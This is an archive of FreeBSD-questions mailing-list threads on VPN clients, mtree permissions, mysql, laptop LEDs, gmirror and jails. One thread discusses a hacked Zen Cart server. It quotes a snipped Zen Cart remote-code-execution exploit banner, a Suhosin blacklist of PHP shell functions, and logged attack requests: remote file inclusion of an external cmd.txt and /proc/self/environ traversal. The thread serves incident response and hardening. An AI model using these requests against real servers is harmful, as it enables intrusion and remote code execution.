http://www.sourcehosting.net/ - Ready. Set. Code. http://twitter.com/sourcehosting/ - Follow me, follow you -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFLZuh80sRouByUApARAvx3AKDBf2N7AL6bdGwB7xstpcLmrAE2dwCgmWkD o2I1yIPXWEaOx4zFl5sl3bM= =P/dg -END PGP SIGNATURE- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
ATT substitute available on freebsd?
hi everybody, I am not quite technical on this, y'know, in windows, we have ATT software to access company intranet, not sure whether we have substitute here? I tried to figure out the ways to do that, no luck. I know on linux distribution they have agnclient. any ideas? thank you! -- TNT - Today, Not Tomorrow ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: ATT substitute available on freebsd?
On 02/01/10 15:37, Jian Jun Wang wrote: hi everybody, I am not quite technical on this, y'know, in windows, we have ATT software to access company intranet, not sure whether we have substitute here? I tried to figure out the ways to do that, no luck. I know on linux distribution they have agnclient. any ideas? You can expect a reliable answer only if someone has figured out what protocol does your software use and has found some alternative. Offhand, since http://info.attbusiness.net/agnclient/index.cfm?fuseaction=home.features mentions ipsec, I'd guess IPSec support might be your answer (http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html). ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: ATT substitute available on freebsd?
In the last episode (Feb 01), Ivan Voras said: On 02/01/10 15:37, Jian Jun Wang wrote: I am not quite technical on this, y'know, in windows, we have ATT software to access company intranet, not sure whether we have substitute here? I tried to figure out the ways to do that, no luck. I know on linux distribution they have agnclient. any ideas? You can expect a reliable answer only if someone has figured out what protocol does your software use and has found some alternative. Offhand, since http://info.attbusiness.net/agnclient/index.cfm?fuseaction=home.features mentions ipsec, I'd guess IPSec support might be your answer (http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html). Also, looking at the posts on the Linux client support forum, ATT is just barely supporting the Linux client as it is (SSL VPN only, no IPSEC support planned, only three OS versions supported). You will probably be better off running a small Windows XP vm inside VirtualBox and using the Windows client from that. http://www.attnetclient.com/forum/viewtopic.php?f=12t=894#p3036 http://www.attnetclient.com/forum/viewtopic.php?f=12t=951#p3239 -- Dan Nelson dnel...@allantgroup.com ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
(please reply-all; I am not sub'd and sorry for the top posting):
I have safe_mode off due to popular demand. So many customer apps demand
that it be kept off. In fact, here is a post from one of the Zen people
on the Zen-cart forum. In light of this exploit, this might be a little
ironic:
http://www.zen-cart.com/forum/showthread.php?t=76740
There is one for-sure patch: Turn off safe-mode.
Keep in mind that future versions of PHP will *not* even include a
safe-mode ... because it's a weak bandage giving a false sense of security
to hosts who don't otherwise know how to properly secure their servers.
This begs the question: why? ie: why would you want to run your online
business on a server that's got to use safe-mode in order to think they're
securing the server?
I'm not trying to badmouth your server administrator; rather I'm
attempting to strongly make the point that unless safe-mode is being used
for a very specific reason for which there is no other solution (an
unlikely situation), it shouldn't be used. And, if it is being used, you
shouldn't run your business there, because there will be other security
issues to which you'll be vulnerable but never have a clue about it until
disaster strikes, because the big picture of security protection has been
poorly implemented.
That said, Zen Cart will install and run even if Safe Mode is active;
however, you run the risk of certain features not working with or without
notice, and the unexpected appearance of warning or fatal errors while
customers are using the site. And then there's the issue of the admin side
needing to do various things that safe-mode doesn't like.
So, I guess, in short ... you can do it, but you do so at your own risk.
Maybe that's more than you wanted to hear ... sorry
From: Bogdan Webb bog...@pgn.ro
try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist witch will deny use of certain php
commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !
ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php
On Sun, 31 Jan 2010, James Smallacombe wrote:
Whoever speculated that my server may have been compromised was on to
something (see bottom). The good news is, it does appear to be contained to
the www unpriveleged user (with no shell). The bad news is, they can still
cause a lot of trouble. I found the compromised customer site and chmod 0
their cart (had php binaries called core(some number).php that gave the
hacker a nice browser screen to cause all kinds of trouble)
Not sure if this is related to the UDP floods, but if not, it's a heck of a
coincidence. At times, CPU went through the roof for the www user, mostly
running some sort of perl scripts (nothing in the suexec-log). I would kill
apache, but couldn't restart it as it would show port 80 in use. I would
have to manually kill processes like these:
www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl)
www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl)
www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34
/sbin/klogd -c 1 -x -x (perl)
www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84
I could not find ANY file named klogd on the system, let alone in /sbin.
Clues as to how to dig myself out of this are appreciated
I found this in /tmp/bx1.txt:
--More--(5%)#!/usr/bin/php
?php
#
# --- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of
anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc 2)
{
echo
=___ Zen Cart 1.3.8 Remote Code Execution Exploit =
| BlackH bl4c...@gmail.com |
| |
| \$system php $argv[0] url|
| Notes: url ex: http://victim.com/site (no slash) |
| |
;exit(1);
--- snipped --
It is dated from two nights ago, after these issues started, but it's
nonetheless larming. Security Focus is aware of the issue and refers you to
Zen for the fix. Only problem is,
Re: /root permission reset on boot
Nerius Landys nlan...@gmail.com writes: I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root, after a reboot it goes back to permission 755. 1. What's the reason for this? There must be a good reason and I would like to know it. Everything in FreeBSD just makes sense and is well designed (honestly, no sarcasm here). It's something local to your machine; this doesn't happen on any machine I've used, and I can't find anything that could be configured for that. 2. Would I want to change the permission of /root to 700 permanently, and how? By default, there's nothing sensitive in that directory, so there's no reason to protect it more thoroughly than the defaults. If you put something in that directory, you might want to change the permissions, but that would be up to you and your own knowledge of your system. -- Lowell Gilbert, embedded/networking software engineer, Boston area http://be-well.ilk.org/~lowell/ ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: ATT substitute available on freebsd?
thank you all for your help, I'd install virtualbox and try in XP. best regards On Tue, Feb 2, 2010 at 12:05 AM, Dan Nelson dnel...@allantgroup.com wrote: In the last episode (Feb 01), Ivan Voras said: On 02/01/10 15:37, Jian Jun Wang wrote: I am not quite technical on this, y'know, in windows, we have ATT software to access company intranet, not sure whether we have substitute here? I tried to figure out the ways to do that, no luck. I know on linux distribution they have agnclient. any ideas? You can expect a reliable answer only if someone has figured out what protocol does your software use and has found some alternative. Offhand, since http://info.attbusiness.net/agnclient/index.cfm?fuseaction=home.features mentions ipsec, I'd guess IPSec support might be your answer (http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html). Also, looking at the posts on the Linux client support forum, ATT is just barely supporting the Linux client as it is (SSL VPN only, no IPSEC support planned, only three OS versions supported). You will probably be better off running a small Windows XP vm inside VirtualBox and using the Windows client from that. http://www.attnetclient.com/forum/viewtopic.php?f=12t=894#p3036 http://www.attnetclient.com/forum/viewtopic.php?f=12t=951#p3239 -- Dan Nelson dnel...@allantgroup.com ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org -- TNT - Today, Not Tomorrow ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: mysql silently failing to start - suggestions?
On 01/02/2010 5:34 π.μ., John wrote: If this isn't the right list - if I should try another let me know - but since this is the mysql-server-5.4.2 package, and since you folks have been so helpful, I thought I'd give it a go. Anyway, the system is 8.0-RELEASE and that package is installed, and I can't start the server. Not only can I not start the server, but it's not giving me a clue. I can't find anything anywhere. Not in /var/log/messages, not anywhere. When I run /usr/local/etc/rc.d/mysqlserver start it says Starting mysql., pauses for several seconds (I don't see anything go by in top) and then the script exits. At that point, one would expect, there's no /tmp/mysql.sock, there's nothing in messages or anywhere else. With nothing to go on, well, I don't know where to start. Any suggestions? Maybe a long shot, but I once had a problem starting mysql because the sticky bit was not set on /tmp. I had previously dump/restored the system and forgot to chmod -R 1777 /tmp Don't remember the exact error message - if there was any - but it took me quite some time to figure out. Have a quick look at this. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
Indeed it's pretty tricky with safe_mode, like for certain i know that a version of a popular r57 shell had safe_mode bypass - i was stunned to check the shell myself on my server... and i was thinking that safe_mode is enough... (+ i was using the suhoshin patch *witch in fact does nothing regarding straightening the php) then i came over suhoshin the addon (witch on my BSD with lighttpd it could be loaded only using Zen framework... for unknown reasons to me) the suhoshin was configured to blacklist some basic commands that allow php to directly run shell commands: suhosin.executor.func.blacklist = proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec thus even if hackers find bugs in some php apps it would be harder to get a shell... i say harder because it's impossible to prevent that - there are mysql ways to get shell and so on ... so it's not 100% foolproof, but it's here's some examples on how suhoshin alerts the attacks: Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home//pgnlinks/index.php') Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home//pvpwww/junkforum/Sources/Subs.php', line 3531) *note - these are logs from /var/log/messages and the last message is a false-positive (i thinks it's called that way) it's a basic function of SMF board to check the DNS with a linux command, but i just wanted to point out how it handles the blacklist... here's a more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd): 2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php') 2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php') 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 302 0 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 200 3304 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3307 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3306 - Mozilla/3.0 (compatible; Indy Library) My server has safe_mode off - bcoz it's not needed (at least in my mind... i might be mistaking) and check out the phpinfo.php file i've got and see the suhoshin settings stay safe! ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
using leds on laptop
My laptop has a led for wireless - It has never been used since I installed freeBSD on this laptop. I was wondering if there was a way I could figure out a) if freeBSD detects it b) a way to use it for something ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: /root permission reset on boot
I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root, after a reboot it goes back to permission 755. 1. What's the reason for this? There must be a good reason and I would like to know it. Everything in FreeBSD just makes sense and is well designed (honestly, no sarcasm here). It's something local to your machine; this doesn't happen on any machine I've used, and I can't find anything that could be configured for that. Perhaps I was mistaken about this happening after every reboot. Perhaps it only happens when I upgrade my world (make buildworld, make installworld, etc.). I do this often (every time a release patch is released). So, perhaps this only happens during these upgrades? ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: /root permission reset on boot
Nerius Landys wrote: I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root, after a reboot it goes back to permission 755. 1. What's the reason for this? There must be a good reason and I would like to know it. Everything in FreeBSD just makes sense and is well designed (honestly, no sarcasm here). It's something local to your machine; this doesn't happen on any machine I've used, and I can't find anything that could be configured for that. Perhaps I was mistaken about this happening after every reboot. Perhaps it only happens when I upgrade my world (make buildworld, make installworld, etc.). I do this often (every time a release patch is released). So, perhaps this only happens during these upgrades? Yup, 99% sure of that. Kevin Kinsey ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: /root permission reset on boot
In the last episode (Feb 01), Nerius Landys said: I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root, after a reboot it goes back to permission 755. 1. What's the reason for this? There must be a good reason and I would like to know it. Everything in FreeBSD just makes sense and is well designed (honestly, no sarcasm here). It's something local to your machine; this doesn't happen on any machine I've used, and I can't find anything that could be configured for that. Perhaps I was mistaken about this happening after every reboot. Perhaps it only happens when I upgrade my world (make buildworld, make installworld, etc.). I do this often (every time a release patch is released). So, perhaps this only happens during these upgrades? I was going to point blame at mtree, but the file for the root filesystem ( /etc/mtree/BSD.root.dist ) just lists /root without forcing a mode value. You could probably use either dtrace or the audit system to log exactly when the permissions get changed. -- Dan Nelson dnel...@allantgroup.com ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: /root permission reset on boot
Nerius Landys nlan...@gmail.com writes: I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root, after a reboot it goes back to permission 755. 1. What's the reason for this? There must be a good reason and I would like to know it. Everything in FreeBSD just makes sense and is well designed (honestly, no sarcasm here). It's something local to your machine; this doesn't happen on any machine I've used, and I can't find anything that could be configured for that. Perhaps I was mistaken about this happening after every reboot. Perhaps it only happens when I upgrade my world (make buildworld, make installworld, etc.). I do this often (every time a release patch is released). So, perhaps this only happens during these upgrades? Yes, that makes more sense. Just change the setting in /etc/mtree/BSD.root.dist. -- Lowell Gilbert, embedded/networking software engineer, Boston area http://be-well.ilk.org/~lowell/ ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: using leds on laptop
On Mon, 1 Feb 2010 20:22:22 +0200, Eitan Adler eitanadlerl...@gmail.com wrote: My laptop has a led for wireless - It has never been used since I installed freeBSD on this laptop. I was wondering if there was a way I could figure out a) if freeBSD detects it b) a way to use it for something I'm not sure if FreeBSD will detect the pure LED, but as you mentioned that it is labelled wireless, it is in relation to the WLAN inside the laptop. Maybe there's a device driver functionality that activates the LED when the WLAN device is active? But like with most modern inventions (such as jacks for phones and speakers that are controlled by a driver, or other nonsense), this issue will be so specific that there's only a very specific driver for an arbitrary version of Windows that utilizes hidden code inside the laptop's secret circuits to switch the LED on. :-) Do you use the laptop's WLAN, and does the LED correspond to any state (like activated, connected, scanning etc.) of the WLAN? Anyway, I would predict that you won't find an easy way to utilize this LED except you're writing a driver for it with specifications the laptop's manufacturer will sell to you if you put enough money onto the table. :-) Otherwise, it's completely useless. By the way, I have an older Toshiba laptop with a mechanical switch for the WLAN component. It activates a LED regardless of any OS-internal setting, maybe it's just switching the WLAN component's power off an on, along with the LED. But that's not modern - today's devices need a driver for that. :-) As I said: Useless stuff. -- Polytropon Magdeburg, Germany Happy FreeBSD user since 4.0 Andra moi ennepe, Mousa, ... ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: using leds on laptop
I'm not sure if FreeBSD will detect the pure LED, but as you mentioned that it is labelled wireless, it is in relation to the WLAN inside the laptop. Maybe there's a device driver functionality that activates the LED when the WLAN device is active? Might be - but I don't have windows so I have no way of testing Do you use the laptop's WLAN, and does the LED correspond to any state (like activated, connected, scanning etc.) of the WLAN? I do use WLAN but it does not correspond to any specific state. Nor does the physical switch change anything Anyway, I would predict that you won't find an easy way to utilize this LED except you're writing a driver for it with specifications the laptop's manufacturer will sell to you if you put enough money onto the table. :-) It happens to be a Lenovo laptop. If I could get a copy of the specification it would make a nice project for me - writing a driver - *wonders* Otherwise, it's completely useless. -- Polytropon Magdeburg, Germany Happy FreeBSD user since 4.0 Andra moi ennepe, Mousa, ... ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: FTP using .netrc
On Mon, Feb 1, 2010 at 11:11 AM, Fbsd1 fb...@a1poweruser.com wrote: Goal is to download the install source directory tree so I can use it as an target for local ftp sysinstall. The problem is that the FreeBSD ftp server keeps timing out before everything is downloaded. This is the error message ftp gives me. 421 Service not available, remote server timed out. Connection closed This is the command line command used to launch the ftp session ftp -v ftp.FreeBSD.org It defaults to using /root/.netrc which is shown below machine ftp.FreeBSD.org login anonymous password f...@home.com macdef init prompt off cd /pub/FreeBSD/releases/i386/8.0-RELEASE epsv4 off mget ERRATA.HTM ERRATA.TXT HARDWARE.HTM HARDWARE.TXT README.HTM mget README.TXT RELNOTES.HTM RELNOTES.TXT cdrom.inf docbook.css $ getdir base catpages dict doc games info kernels manpages ports proflibs src quit macdef getdir ! mkdir $i mget $i/* Question is how can I make FTP resume the download at the place it timed out. IE not start at the beginning and re-download all the same files all ready received. ftp -vR ftp.FreeBSD.org just starts downloading from the beginning again. That .netrc looks familiar ;) I never had that issue, but I always used a ftp mirror site listed in the handbook, instead of one of the busiest ftp sites in the world .;) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Using GPT partitions with gmirror
Because we have large drives (2TB) we're switching to gpart to partition our disks. I had previously been using fdisk/bsdlabel and setting up specially configured partition tables that would work with gmirror. This involved faking the size of the c partition to make sure there was space for gmirror to store its metadata. Now that I'm using gpart I'm wondering if any of this trickery is needed? Can I simply create my partitions with gpart then create mirrored partitions using these partitions? I've tried this and it seems to work fine but I'm just being cautious. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: using leds on laptop
On Mon, Feb 1, 2010 at 2:24 PM, Eitan Adler eitanadlerl...@gmail.com wrote: I'm not sure if FreeBSD will detect the pure LED, but as you mentioned that it is labelled wireless, it is in relation to the WLAN inside the laptop. Maybe there's a device driver functionality that activates the LED when the WLAN device is active? Might be - but I don't have windows so I have no way of testing Do you use the laptop's WLAN, and does the LED correspond to any state (like activated, connected, scanning etc.) of the WLAN? I do use WLAN but it does not correspond to any specific state. Nor does the physical switch change anything Anyway, I would predict that you won't find an easy way to utilize this LED except you're writing a driver for it with specifications the laptop's manufacturer will sell to you if you put enough money onto the table. :-) It happens to be a Lenovo laptop. If I could get a copy of the specification it would make a nice project for me - writing a driver - *wonders* Otherwise, it's completely useless. -- Polytropon Magdeburg, Germany Happy FreeBSD user since 4.0 Andra moi ennepe, Mousa, ... ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org If it's and Intel card (iwi(4), ipw(4), iwn(4)), it's a matter of knowing what command to send to the firmware. What device do you have in the laptop? Check the dmesg(8) output... -Brandon ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: using leds on laptop
It is a Broadcom card and I need ndis to use it. I do not know if the light is attached to the wireless card though (it appears next to the power and charging lights) ndis0: Broadcom 802.11g Network Adapter mem 0xf470-0xf4703fff irq 18 at device 0.0 on pci4 bge0: Broadcom BCM5906 A2, ASIC rev. 0xc002 mem 0xf460-0xf460 irq 17 at device 0.0 on pci7 On Mon, Feb 1, 2010 at 11:35 PM, Brandon Gooch jamesbrandongo...@gmail.comwrote: On Mon, Feb 1, 2010 at 2:24 PM, Eitan Adler eitanadlerl...@gmail.com wrote: I'm not sure if FreeBSD will detect the pure LED, but as you mentioned that it is labelled wireless, it is in relation to the WLAN inside the laptop. Maybe there's a device driver functionality that activates the LED when the WLAN device is active? Might be - but I don't have windows so I have no way of testing Do you use the laptop's WLAN, and does the LED correspond to any state (like activated, connected, scanning etc.) of the WLAN? I do use WLAN but it does not correspond to any specific state. Nor does the physical switch change anything Anyway, I would predict that you won't find an easy way to utilize this LED except you're writing a driver for it with specifications the laptop's manufacturer will sell to you if you put enough money onto the table. :-) It happens to be a Lenovo laptop. If I could get a copy of the specification it would make a nice project for me - writing a driver - *wonders* Otherwise, it's completely useless. -- Polytropon Magdeburg, Germany Happy FreeBSD user since 4.0 Andra moi ennepe, Mousa, ... ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org If it's and Intel card (iwi(4), ipw(4), iwn(4)), it's a matter of knowing what command to send to the firmware. What device do you have in the laptop? Check the dmesg(8) output... -Brandon ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Using GPT partitions with gmirror
On Mon, 1 Feb 2010 15:20:40 -0600, Peter Steele wrote Because we have large drives (2TB) we're switching to gpart to partition our disks. I had previously been using fdisk/bsdlabel and setting up specially configured partition tables that would work with gmirror. This involved faking the size of the c partition to make sure there was space for gmirror to store its metadata. Now that I'm using gpart I'm wondering if any of this trickery is needed? Can I simply create my partitions with gpart then create mirrored partitions using these partitions? I've tried this and it seems to work fine but I'm just being cautious. http://lists.freebsd.org/pipermail/freebsd-questions/2009-July/201891.html ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
How far to go with jailing?
Strikes me that setting up jails for bloody-well-every-other service might be 'fun' .. Jail the webserver; seems a logical break, and keep you honest for your partitioning. No more ~/public_html to access it I suppose, but much mroe secure for when people attack your wordpress etc. Jail the 'email services'; use fetchmail to pull down to the jail, and IMAP and POP3 to serve the mail even to local clients; nice clean email mini-server right there in the jail? Jail SMB-serving, so if attacked it still can only serve the content in the very well defined area. Jail the mailing list (mailman etc) .. keep things nice and clean. But is setting up a whole stack of jails a pain? a performance problem? or just un-necessary overkill? Or a good idea? jeff -- If everyone would put barbecue sauce on their food, there would be no war. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: How far to go with jailing?
On 1 February 2010 20:57, Jeff Mitchell skee...@skeleton.org wrote: Strikes me that setting up jails for bloody-well-every-other service might be 'fun' .. Jail the webserver; seems a logical break, and keep you honest for your partitioning. No more ~/public_html to access it I suppose, but much mroe secure for when people attack your wordpress etc. Jail the 'email services'; use fetchmail to pull down to the jail, and IMAP and POP3 to serve the mail even to local clients; nice clean email mini-server right there in the jail? Jail SMB-serving, so if attacked it still can only serve the content in the very well defined area. Jail the mailing list (mailman etc) .. keep things nice and clean. But is setting up a whole stack of jails a pain? a performance problem? or just un-necessary overkill? Or a good idea? I don't know about the performance, though given what I [believe I] know, if your machine is already running those serv[ice|er]s, the effect ranges from lightly noticeable to entirely negligible. You do have to keep track of the jails ( update when necessary), though I suppose if you can't write scripts to do the tedious bits you might be in the w rong business. I think it's a good idea, frankly. Lift and separate, as they said in the 1990s. -- -- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Shutdown
I have completely lost the ability to shutdown/reboot/logout... I've found a few pages on this issue, and nothing seems to resolve the issue. I'm in wheel, operator groups, hal, dbus, gnome_enable all set... consolekit showing a token, proc mounted... and still nothing... what else could be wrong? ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Shutdown
On Mon, 1 Feb 2010, Jeff Molofee wrote: I have completely lost the ability to shutdown/reboot/logout... I've found a few pages on this issue, and nothing seems to resolve the issue. I'm in wheel, operator groups, hal, dbus, gnome_enable all set... consolekit showing a token, proc mounted... and still nothing... what else could be wrong? How are you trying to trigger a shutdown, and in what environment? There are PolicyKit settings you need: http://groups.google.com/group/comp.unix.bsd.freebsd.misc/msg/0d049accfb7fa387?dmode=source There was that recent policykit/polkit port upgrade, too. -Warren Block * Rapid City, South Dakota USA ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: How far to go with jailing?
Jeff Mitchell wrote: Strikes me that setting up jails for bloody-well-every-other service might be 'fun' .. ... Jail the webserver; seems a logical break, and keep you honest for your partitioning. No more ~/public_html to access it I suppose, but much mroe secure for when people attack your wordpress etc. To us, ~/public_html is important, and needs to be considered for our primary domain. This is legacy, going back to 1995. Jail the 'email services'; use fetchmail to pull down to the jail, and IMAP and POP3 to serve the mail even to local clients; nice clean email mini-server right there in the jail? On a home system, sounds great! Jail SMB-serving, so if attacked it still can only serve the content in the very well defined area. ...should be separated physically, IMHO, unless it's a home server. Jail the mailing list (mailman etc) .. keep things nice and clean. But is setting up a whole stack of jails a pain? a performance problem? or just un-necessary overkill? Or a good idea? Its a management pain. In a production ISP/hosting environment, you still have to treat each jail as if its a server. The more servers you have, the more maintenance and management you have. I don't think that there is an easy answer to what you're asking. Personally, I use jails to segregate top-level functions that I want to put into development and possibly further into production. - DNS - SMTP, IMAP, POP3 - authentication (RADIUS etc) - HTTP etc - software devel, web - software devel, non-web - devel software implementation, testing - inline with production - build processes (testing new features of FBSD) - stage area of test builds, prior to implementation - protocol testing (ie. IPv6) ...after that, I've always chosen to put each core critical function onto a separate physical server, and then replicate it to another physical server. However, I have been toying/researching the idea of replicating 'jails' across the network to separate physical hardware, as it would save physical space, hydro, network drops etc for each box that we have. Other than knowing what hardware we have in our PoPs, I use SSH to communicate with every device that I have, so if someone else set it up for me, I wouldn't know that it's a jail. Use jails to define boundaries. Don't get overzealous. I don't see the need to put each web hosting client within their own jail, unless you determine the risk warrants such. Same for email. If risk is that high, then that particular client should pay for collocation anyway ;) It comes down to what you can consider as your risk assessment. If you are just playing along at home, set up as many as you can, and test for yourself. Performance hit is dependent on the hardware that you are running. I don't notice any difference on a standard box with a couple of jails over one that doesn't have any... Steve ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: How can I copy the data of buf in kernel space to the uio structhre in user space.
Jun Furukawa wrote: Hi, For my research, I am now hooking the function vn_write(). [ big snip ] How can I solve this problem? Subscribe to freebsd-hackers@, and post your message there. Hopefully they can help. Steve ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: using leds on laptop
On Mon, Feb 01, 2010 at 10:24:41PM +0200, Eitan Adler wrote: It happens to be a Lenovo laptop. If I could get a copy of the specification it would make a nice project for me - writing a driver - *wonders* Which Lenovo laptop model is it? -- Chad Perrin [ original content licensed OWL: http://owl.apotheon.org ] pgpvvD4VDOa8l.pgp Description: PGP signature
Re: mysql silently failing to start - suggestions? (FIXED!)
